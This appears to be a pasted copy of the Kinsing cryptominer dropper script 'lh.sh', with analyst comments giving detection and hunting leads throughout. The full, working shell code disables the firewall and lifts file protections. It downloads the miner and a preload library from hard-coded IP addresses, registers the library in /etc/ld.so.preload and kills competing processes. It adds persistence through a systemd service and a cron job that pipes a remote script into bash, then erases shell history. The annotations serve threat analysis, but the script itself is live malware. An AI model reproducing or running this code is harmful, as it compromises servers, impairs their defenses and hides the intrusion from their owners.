
lh.sh

a guest
Dec 10th, 2021
  1. #!/bin/bash
  2.  
  # Analyst note: environment preparation. Raises this shell's open-file limit.
  3. ulimit -n 65535
  4.  
  # Clears the immutable attribute on /etc/ld.so.preload and deletes the file, then
  # clears the immutable attribute on the cron spool and /etc/crontab, which makes
  # them editable by the later stages. chattr -i on these paths is worth alerting on.
  5. chattr -i /etc/ld.so.preload
  6. rm -f /etc/ld.so.preload
  7. chattr -R -i /var/spool/cron
  8. chattr -i /etc/crontab
  # Defense impairment: disables ufw and flushes the iptables rules.
  9. ufw disable
  10. iptables -F
  # Turns the kernel NMI watchdog off now and appends the same setting to
  # /etc/sysctl.conf; the appended line stays behind as a host artifact.
  11. echo '0' >/proc/sys/kernel/nmi_watchdog
  12. echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
  # Value that `id -u` is compared against to pick the root or non-root path.
  13. ROOTUID="0"
  14.  
  # __curl URL: fallback HTTP fetcher built on bash's /dev/tcp redirection, used
  # further down when neither curl nor wget is found.
  # Arguments: $1 - URL; it is split on "/" into proto, server and path.
  # Outputs:   response body on stdout.
  # Detection: the connection is opened by the bash process itself, so controls
  # keyed on curl/wget process names do not see it. The request is plain HTTP/1.0
  # with no TLS and no check of the response status.
  15. function __curl() {
  16.   read proto server path <<<$(echo ${1//// })
  17.   DOC=/${path// //}
  18.   HOST=${server//:*}
  19.   PORT=${server//*:}
  # No ":port" in the server part leaves HOST and PORT equal, so default to 80.
  20.   [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
  21.  
  # fd 3 is a read/write TCP socket to HOST:PORT.
  22.   exec 3<>/dev/tcp/${HOST}/$PORT
  23.   echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  # Skip header lines up to the first bare CR line, then stream the rest.
  24.   (while read line; do
  25.    [[ "$line" == $'\r' ]] && break
  26.   done && cat) <&3
  27.   exec 3>&-
  28. }
  29.  
  # Tool check: looks for a non-empty /usr/bin/curl or /usr/bin/wget. When neither
  # exists and the script runs as root, it installs curl, wget and cron with apt-get.
  # Hunting lead: apt-get installs of these packages started by a non-interactive
  # shell, outside normal change activity.
  30. if [ -s /usr/bin/curl ]; then
  31.   echo "found curl"
  32. elif [ -s /usr/bin/wget ]; then
  33.   echo "found wget"
  34. else
  35.   echo "found none"
  36.   if [ "$(id -u)" -ne "$ROOTUID" ] ; then
  37.     echo "not root"
  38.   else
  39.     apt-get update
  40.     apt-get install -y curl
  41.     apt-get install -y wget
  42.     apt-get install -y cron
  43.   fi
  44. fi
  45.  
  46.  
  # Artifact names: systemd service "bot", payload file "kinsing", shared object
  # "libsystem.so". As root the drop directory is /etc.
  47. SERVICE_NAME="bot"
  48. BIN_NAME="kinsing"
  49. SO_NAME="libsystem.so"
  50. BIN_PATH="/etc"
  # Non-root path: walks a fallback chain of writable directories, in order
  # /tmp, /var/tmp, a fresh mktemp -d directory, /dev/shm.
  # Hunting lead: files named kinsing or libsystem.so in any of these locations.
  51. if [ "$(id -u)" -ne "$ROOTUID" ] ; then
  52.   BIN_PATH="/tmp"
  53.   if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then
  54.     echo "$BIN_PATH not exists or not writeable"
  55.     mkdir /tmp
  56.   fi
  57.   if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then
  58.     echo "$BIN_PATH replacing with /var/tmp"
  59.     BIN_PATH="/var/tmp"
  60.   fi
  61.   if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then
  62.     TMP_DIR=$(mktemp -d)
  63.     echo "$BIN_PATH replacing with $TMP_DIR"
  64.     BIN_PATH="$TMP_DIR"
  65.   fi
  66.   if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then
  67.     echo "$BIN_PATH replacing with /dev/shm"
  68.     BIN_PATH="/dev/shm"
  69.   fi
  # If a file with the payload name already exists but is not writable, the name
  # becomes "kinsing_" plus up to 8 random alphanumeric characters, so filename
  # matching should cover that pattern as well as the fixed name.
  70.   if [ -e "$BIN_PATH/$BIN_NAME" ]; then
  71.     echo "$BIN_PATH/$BIN_NAME exists"
  72.     if [ ! -w "$BIN_PATH/$BIN_NAME" ]; then
  73.       echo "$BIN_PATH/$BIN_NAME not writeable"
  74.       TMP_BIN_NAME=$(head -3 /dev/urandom | tr -cd '[:alnum:]' | cut -c -8)
  75.       BIN_NAME="kinsing_$TMP_BIN_NAME"
  76.     else
  77.       echo "writeable $BIN_PATH/$BIN_NAME"
  78.     fi
  79.   fi
  80. fi
  81. BIN_FULL_PATH="$BIN_PATH/$BIN_NAME"
  82. echo "$BIN_FULL_PATH"
  83.  
  # Indicators: expected MD5 of the payload and its download locations. The primary
  # and secondary URLs are identical in this listing, and all are plain HTTP to a
  # bare IP address. CURL_DOWNLOAD_URL is the replacement curl binary fetched when
  # no download tool is present.
  84. BIN_MD5="648effa354b3cbaad87b45f48d59c616"
  85. BIN_DOWNLOAD_URL="http://80.71.158.44/kinsing"
  86. BIN_DOWNLOAD_URL2="http://80.71.158.44/kinsing"
  87. CURL_DOWNLOAD_URL="http://80.71.158.44/curl-amd64"
  88.  
  # Same for the shared object that is later registered in /etc/ld.so.preload.
  89. SO_FULL_PATH="$BIN_PATH/$SO_NAME"
  90. SO_DOWNLOAD_URL="http://80.71.158.44/libsystem.so"
  91. SO_DOWNLOAD_URL2="http://80.71.158.44/libsystem.so"
  92. SO_MD5="ccef46c7edf9131ccffc47bd69eb743b"
  93.  
  94.  
  # LDR is the fetch-to-stdout command embedded in the cron entry at the end of the
  # script: "wget -q -O -" by default, "curl" when /usr/bin/curl is non-empty, and
  # wget again when /usr/bin/wget is non-empty (wget wins if both are present).
  95. LDR="wget -q -O -"
  96. if [ -s /usr/bin/curl ]; then
  97.   LDR="curl"
  98. fi
  99. if [ -s /usr/bin/wget ]; then
  100.   LDR="wget -q -O -"
  101. fi
  102.  
  # WGET is the download-to-file command used by download(). When neither curl nor
  # wget resolves through command -v, a curl binary is pulled from CURL_DOWNLOAD_URL
  # with the /dev/tcp fetcher and tried from /usr/local/bin, $HOME and $BIN_PATH.
  # Hunting lead: an executable named "curl" in a home or temporary directory, or a
  # /usr/local/bin/curl that no package owns.
  103. if [ -x "$(command -v curl)" ]; then
  104.   WGET="curl -o"
  105. elif [ -x "$(command -v wget)" ]; then
  106.   WGET="wget -O"
  107. else
  108.   curl -V || __curl "$CURL_DOWNLOAD_URL" > /usr/local/bin/curl; chmod +x /usr/local/bin/curl
  109.   /usr/local/bin/curl -V && WGET="/usr/local/bin/curl -o"
  110.   /usr/local/bin/curl -V || __curl "$CURL_DOWNLOAD_URL" > $HOME/curl; chmod +x $HOME/curl
  111.   $HOME/curl -V && WGET="$HOME/curl -o"
  112.   $HOME/curl -V || __curl "$CURL_DOWNLOAD_URL" > $BIN_PATH/curl; chmod +x $BIN_PATH/curl
  113.   $BIN_PATH/curl -V && WGET="$BIN_PATH/curl -o"
  114. fi
  115. echo "wget is $WGET"
  116.  
  # Lists the drop directory and checks the output for the string "/dev". On a
  # match it deletes the payload, the shared object and any kdevtmpfsi file.
  # NOTE(review): presumably this catches entries that are symlinks into /dev
  # (ls -la prints the link target) - inferred from the pattern, confirm on a sample.
  117. ls -la $BIN_PATH | grep -e "/dev" | grep -v grep
  118. if [ $? -eq 0 ]; then
  119.   rm -rf $BIN_FULL_PATH
  120.   rm -rf $SO_FULL_PATH
  121.   rm -rf $BIN_PATH/kdevtmpfsi
  122.   rm -rf $BIN_PATH/libsystem.so
  123.   rm -rf /tmp/kdevtmpfsi
  124.   echo "found /dev"
  125. else
  126.   echo "not found /dev"
  127. fi
  128.  
  # download PATH URL: fetches URL to PATH with the command held in $WGET.
  # Globals:   WGET (read); DOWNLOAD_PATH, DOWNLOAD_URL (written)
  # Arguments: $1 - destination path, $2 - source URL
  # A symlink or directory already sitting at the destination is removed first.
  # No integrity check happens here; callers run checkExists separately.
  # Detection: a file set to mode 777, written by curl/wget, then made executable.
  129. download() {
  130.   DOWNLOAD_PATH=$1
  131.   DOWNLOAD_URL=$2
  132.   if [ -L $DOWNLOAD_PATH ]
  133.   then
  134.     rm -rf $DOWNLOAD_PATH
  135.   fi
  136.   if [[ -d $DOWNLOAD_PATH ]]
  137.   then
  138.     rm -rf $DOWNLOAD_PATH
  139.   fi
  140.   chmod 777 $DOWNLOAD_PATH
  141.   $WGET $DOWNLOAD_PATH $DOWNLOAD_URL
  142.   chmod +x $DOWNLOAD_PATH
  143. }
  144.  
  # checkExists PATH MD5: compares the md5sum of PATH with the expected value.
  # Arguments: $1 - file to hash, $2 - expected MD5 hex string
  # Outputs:   "true" or "false" on stdout; a diagnostic line on stderr
  # A missing file yields an empty sum and therefore "false".
  145. checkExists() {
  146.   CHECK_PATH=$1
  147.   MD5=$2
  148.   sum=$(md5sum $CHECK_PATH | awk '{ print $1 }')
  149.   retval=""
  150.   if [ "$MD5" = "$sum" ]; then
  151.     echo >&2 "$CHECK_PATH is $MD5"
  152.     retval="true"
  153.   else
  154.     echo >&2 "$CHECK_PATH is not $MD5, actual $sum"
  155.     retval="false"
  156.   fi
  157.   echo "$retval"
  158. }
  159.  
  # getSystemd PATH: prints a systemd unit file to stdout with ExecStart set to PATH.
  # Arguments: $1 - executable the unit should start
  # The unit is Type=forking with Restart=always and RestartSec=10s, so stopping the
  # process alone is not enough; the unit has to be disabled and removed as well.
  160. getSystemd() {
  161.   AUTOSTART_PATH=$1
  162.   echo "[Unit]"
  163.   echo "Description=Start daemon at boot time"
  164.   echo "After="
  165.   echo "Requires="
  166.   echo "[Service]"
  167.   echo "Type=forking"
  168.   echo "RestartSec=10s"
  169.   echo "Restart=always"
  170.   echo "TimeoutStartSec=5"
  171.   echo "ExecStart=$AUTOSTART_PATH"
  172.   echo "[Install]"
  173.   echo "WantedBy=multi-user.target"
  174. }
  175.  
  # kill: terminates other processes on the host with SIGKILL. The function name
  # shadows the shell's kill builtin for the rest of the script; the kill -9 calls
  # inside run through xargs, i.e. the external kill binary.
  # Targets are selected by command-line substring (pkill -f), by network peer
  # (netstat -anp), by PIDs read from fixed pid files, and by command-name length.
  # The strings supportxmr, monero and c3pool point at Monero mining; presumably the
  # rest are other implants competing for the host - not verifiable from this page.
  # Detection: bursts of pkill -f / kill -9 from one shell, and netstat -anp
  # piped into kill, are uncommon in normal administration.
  176. kill(){
  # agetty processes using more than 80% CPU.
  177.   ps aux | grep "agetty" | grep -v grep | awk '{if($3>80.0) print $2}' | xargs -I % kill -9 %
  178.   pkill -f 42.112.28.216
  # Processes that own a socket matching the given address or address:port.
  179.   netstat -anp | grep "207.38.87.6" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  180.   netstat -anp | grep "127.0.0.1:52018" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  181.   netstat -anp | grep "34.81.218.76:9486" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  182.   netstat -anp | grep "42.112.28.216:9486" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  183.   pkill -f .git/kthreaddw
  184.   pkill -f 80.211.206.105
  185.   pkill -f 207.38.87.6
  186.   pkill -f p8444
  187.   pkill -f supportxmr
  188.   pkill -f monero
  189.   pkill -f kthreaddi
  190.   pkill -f srv00
  191.   pkill -f /tmp/.javae/javae
  192.   pkill -f .javae
  193.   pkill -f .syna
  194.   pkill -f .main
  195.   pkill -f xmm
  196.   pkill -f solr.sh
  197.   pkill -f /tmp/.solr/solrd
  198.   pkill -f /tmp/javac
  199.   pkill -f /tmp/.go.sh
  200.   pkill -f /tmp/.x/agetty
  201.   pkill -f /tmp/.x/kworker
  202.   pkill -f c3pool
  203.   pkill -f /tmp/.X11-unix/gitag-ssh
  204.   pkill -f /tmp/1
  205.   pkill -f /tmp/okk.sh
  206.   pkill -f /tmp/gitaly
  207.   pkill -f /tmp/.x/kworker
  208.   pkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
  209.   pkill -f /tmp/.X11-unix/supervise
  210.   pkill -f /tmp/.ssh/redis.sh
  211.   ps aux| grep "./udp"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
  # PIDs read from fixed pid files under /tmp and $HOME/data.
  212.   cat /tmp/.X11-unix/01|xargs -I % kill -9 %
  213.   cat /tmp/.X11-unix/11|xargs -I % kill -9 %
  214.   cat /tmp/.X11-unix/22|xargs -I % kill -9 %
  215.   cat /tmp/.pg_stat.0|xargs -I % kill -9 %
  216.   cat /tmp/.pg_stat.1|xargs -I % kill -9 %
  217.   cat $HOME/data/./oka.pid|xargs -I % kill -9 %
  218.   pkill -f zsvc
  219.   pkill -f pdefenderd
  220.   pkill -f updatecheckerd
  221.   pkill -f cruner
  222.   pkill -f dbused
  223.   pkill -f bashirc
  224.   pkill -f meminitsrv
  225.   ps aux| grep "./oka"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
  226.   ps aux| grep "postgres: autovacum"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
  # Length heuristics: any process whose first command word is exactly 8 or 16
  # characters long is killed unless its line contains one of the excluded strings.
  # Legitimate services can match, so unexplained process deaths on a host are a
  # symptom worth correlating with the other indicators in this script.
  227.   ps ax -o command,pid -www| awk 'length($1) == 8'|grep -v bin|grep -v "\["|grep -v "("|grep -v "php-fpm"|grep -v proxymap|grep -v postgres|grep -v postgrey|grep -v kinsing| awk '{print $2}'|xargs -I % kill -9 %
  228.   ps ax -o command,pid -www| awk 'length($1) == 16'|grep -v bin|grep -v "\["|grep -v "("|grep -v "php-fpm"|grep -v proxymap|grep -v postgres|grep -v postgrey| awk '{print $2}'|xargs -I % kill -9 %
  229.   ps ax| awk 'length($5) == 8'|grep -v bin|grep -v "\["|grep -v "("|grep -v "php-fpm"|grep -v proxymap|grep -v postgres|grep -v postgrey| awk '{print $1}'|xargs -I % kill -9 %
  230.   ps aux | grep -v grep | grep '/tmp/sscks' | awk '{print $2}' | xargs -I % kill -9 %
  231. }
  232.  
  # Runs the process-termination routine defined above before any download or launch.
  233. kill
  # autoinit: systemd persistence. Writes the unit text from getSystemd to
  # /lib/systemd/system/$SERVICE_NAME.service, then enables and starts it.
  # Globals: BIN_FULL_PATH, SERVICE_NAME (read)
  # Hunting lead: a bot.service unit whose ExecStart points at the payload path.
  # Called only on the root branch further down in the script.
  234. autoinit() {
  235.   getSystemd $BIN_FULL_PATH >/lib/systemd/system/$SERVICE_NAME.service
  236.   systemctl enable $SERVICE_NAME
  237.   systemctl start $SERVICE_NAME
  238. }
  239.  
  # so: verifies or downloads the shared object, then registers it in
  # /etc/ld.so.preload so the dynamic linker loads it into dynamically linked
  # processes started afterwards.
  # Globals: SO_FULL_PATH, SO_MD5, SO_DOWNLOAD_URL, SO_DOWNLOAD_URL2 (read)
  # NOTE(review): what the library does once loaded is not visible in this script.
  # Observable behaviour: when the first hash check fails, both download calls run
  # in this listing (the conditions that follow read the first check's result), so
  # expect up to two GETs for libsystem.so. The write to /etc/ld.so.preload at the
  # end is not gated on any hash result.
  # Detection: any non-empty /etc/ld.so.preload deserves review; on most systems
  # the file is absent or empty.
  240. so() {
  241.   soExists=$(checkExists "$SO_FULL_PATH" "$SO_MD5")
  242.   if [ "$soExists" == "true" ]; then
  243.     echo "$SO_FULL_PATH exists and checked"
  244.   else
  245.     echo "$SO_FULL_PATH not exists"
  246.     download $SO_FULL_PATH $SO_DOWNLOAD_URL
  247.     binExists=$(checkExists "$SO_FULL_PATH" "$SO_MD5")
  248.     if [ "$soExists" == "true" ]; then
  249.       echo "$SO_FULL_PATH after download exists and checked"
  250.     else
  251.       echo "$SO_FULL_PATH after download not exists"
  252.       download $SO_FULL_PATH $SO_DOWNLOAD_URL2
  253.       binExists=$(checkExists "$SO_FULL_PATH" "$SO_MD5")
  254.       if [ "$soExists" == "true" ]; then
  255.         echo "$SO_FULL_PATH after download2 exists and checked"
  256.       else
  257.         echo "$SO_FULL_PATH after download2 not exists"
  258.       fi
  259.     fi
  260.   fi
  261.   echo $SO_FULL_PATH >/etc/ld.so.preload
  262. }
  263.  
  # cleanCron: rewrites the current user's crontab once per pattern, deleting every
  # line that matches. The patterns name hosts, script names and keywords.
  # Several are broad: /tmp/, /sleep/, /github/, /world/ and /ash/ (which also
  # matches "bash") remove legitimate jobs too, and "." in a pattern matches any
  # character. During recovery, restore crontabs from a known-good copy instead of
  # only deleting the entry this script adds.
  # Detection: many crontab -l / crontab - pairs within a few seconds from one
  # parent shell.
  264. cleanCron() {
  265.   crontab -l | sed '/base64/d' | crontab -
  266.   crontab -l | sed '/_cron/d' | crontab -
  267.   crontab -l | sed '/31.210.20.181/d' | crontab -
  268.   crontab -l | sed '/update.sh/d' | crontab -
  269.   crontab -l | sed '/logo4/d' | crontab -
  270.   crontab -l | sed '/logo9/d' | crontab -
  271.   crontab -l | sed '/logo0/d' | crontab -
  272.   crontab -l | sed '/logo/d' | crontab -
  273.   crontab -l | sed '/tor2web/d' | crontab -
  274.   crontab -l | sed '/jpg/d' | crontab -
  275.   crontab -l | sed '/png/d' | crontab -
  276.   crontab -l | sed '/tmp/d' | crontab -
  277.   crontab -l | sed '/zmreplchkr/d' | crontab -
  278.   crontab -l | sed '/aliyun.one/d' | crontab -
  279.   crontab -l | sed '/3.215.110.66.one/d' | crontab -
  280.   crontab -l | sed '/pastebin/d' | crontab -
  281.   crontab -l | sed '/onion/d' | crontab -
  282.   crontab -l | sed '/lsd.systemten.org/d' | crontab -
  283.   crontab -l | sed '/shuf/d' | crontab -
  284.   crontab -l | sed '/ash/d' | crontab -
  285.   crontab -l | sed '/mr.sh/d' | crontab -
  286.   crontab -l | sed '/185.181.10.234/d' | crontab -
  287.   crontab -l | sed '/localhost.xyz/d' | crontab -
  288.   crontab -l | sed '/45.137.151.106/d' | crontab -
  289.   crontab -l | sed '/111.90.159.106/d' | crontab -
  290.   crontab -l | sed '/github/d' | crontab -
  291.   crontab -l | sed '/bigd1ck.com/d' | crontab -
  292.   crontab -l | sed '/xmr.ipzse.com/d' | crontab -
  293.   crontab -l | sed '/185.181.10.234/d' | crontab -
  294.   crontab -l | sed '/146.71.79.230/d' | crontab -
  295.   crontab -l | sed '/122.51.164.83/d' | crontab -
  296.   crontab -l | sed '/newdat.sh/d' | crontab -
  297.   crontab -l | sed '/lib.pygensim.com/d' | crontab -
  298.   crontab -l | sed '/t.amynx.com/d' | crontab -
  299.   crontab -l | sed '/update.sh/d' | crontab -
  300.   crontab -l | sed '/systemd-service.sh/d' | crontab -
  301.   crontab -l | sed '/pg_stat.sh/d' | crontab -
  302.   crontab -l | sed '/sleep/d' | crontab -
  303.   crontab -l | sed '/oka/d' | crontab -
  304.   crontab -l | sed '/linux1213/d' | crontab -
  305.   crontab -l | sed '/#wget/d' | crontab -
  306.   crontab -l | sed '/#curl/d' | crontab -
  307.   crontab -l | sed '/zsvc/d' | crontab -
  308.   crontab -l | sed '/givemexyz/d' | crontab -
  309.   crontab -l | sed '/world/d' | crontab -
  310.   crontab -l | sed '/1.sh/d' | crontab -
  311.   crontab -l | sed '/3.sh/d' | crontab -
  312.   crontab -l | sed '/workers/d' | crontab -
  313.   crontab -l | sed '/oracleservice/d' | crontab -
  314. }
  315.  
  # Payload staging: hashes the file at BIN_FULL_PATH and, on mismatch, downloads it
  # from the primary URL, re-checks, and falls back to the secondary URL. The final
  # result is only echoed here; nothing in this section stops the script when every
  # check fails.
  316. binExists=$(checkExists "$BIN_FULL_PATH" "$BIN_MD5")
  317. if [ "$binExists" == "true" ]; then
  318.   echo "$BIN_FULL_PATH exists and checked"
  319. else
  320.   echo "$BIN_FULL_PATH not exists"
  321.   download $BIN_FULL_PATH $BIN_DOWNLOAD_URL
  322.   binExists=$(checkExists "$BIN_FULL_PATH" "$BIN_MD5")
  323.   if [ "$binExists" == "true" ]; then
  324.     echo "$BIN_FULL_PATH after download exists and checked"
  325.   else
  326.     echo "$BIN_FULL_PATH after download not exists"
  327.     download $BIN_FULL_PATH $BIN_DOWNLOAD_URL2
  328.     binExists=$(checkExists "$BIN_FULL_PATH" "$BIN_MD5")
  329.     if [ "$binExists" == "true" ]; then
  330.       echo "$BIN_FULL_PATH after download2 exists and checked"
  331.     else
  332.       echo "$BIN_FULL_PATH after download2 not exists"
  333.     fi
  334.   fi
  335. fi
  336.  
  # Execution stage: registers the preload library, removes any /tmp/kdevtmpfsi,
  # sets the payload to mode 777 and executable, and launches it. The launch does
  # not depend on the MD5 result computed earlier.
  # SKL=lh is passed through the environment.
  # NOTE(review): what SKL means to the binary is not visible in this script.
  337. so
  338. if [ -L /tmp/kdevtmpfsi ]
  339. then
  340.   rm -rf /tmp/kdevtmpfsi
  341. fi
  342. rm -rf /tmp/kdevtmpfsi
  343. chmod 777 $BIN_FULL_PATH
  344. chmod +x $BIN_FULL_PATH
  345. SKL=lh $BIN_FULL_PATH
  346.  
  # systemd persistence is installed only when running as root.
  347. if [[ $(id -u) -ne 0 ]]; then
  348.   echo "Running as not root"
  349. else
  350.   echo "Running as root"
  351.   autoinit
  352. fi
  353.  
  354. cleanCron
  355.  
  # Cron persistence: unless the crontab already references 185.191.32.198, appends
  # an every-minute entry that pipes http://185.191.32.198/lh.sh into bash via $LDR.
  # Hunting lead: crontab lines that pipe a download from a bare IP into a shell.
  356. crontab -l | grep -e "185.191.32.198" | grep -v grep
  357. if [ $? -eq 0 ]; then
  358.   echo "cron good"
  359. else
  360.   (
  361.     crontab -l 2>/dev/null
  362.     echo "* * * * * $LDR http://185.191.32.198/lh.sh | bash > /dev/null 2>&1"
  363.   ) | crontab -
  364. fi
  365.  
  # Anti-forensics: clears the in-memory shell history and deletes ~/.bash_history.
  # Process-execution telemetry (auditd, EDR) is unaffected by this and remains the
  # reliable record of what ran.
  366. history -c
  367. rm -rf ~/.bash_history
  368. history -c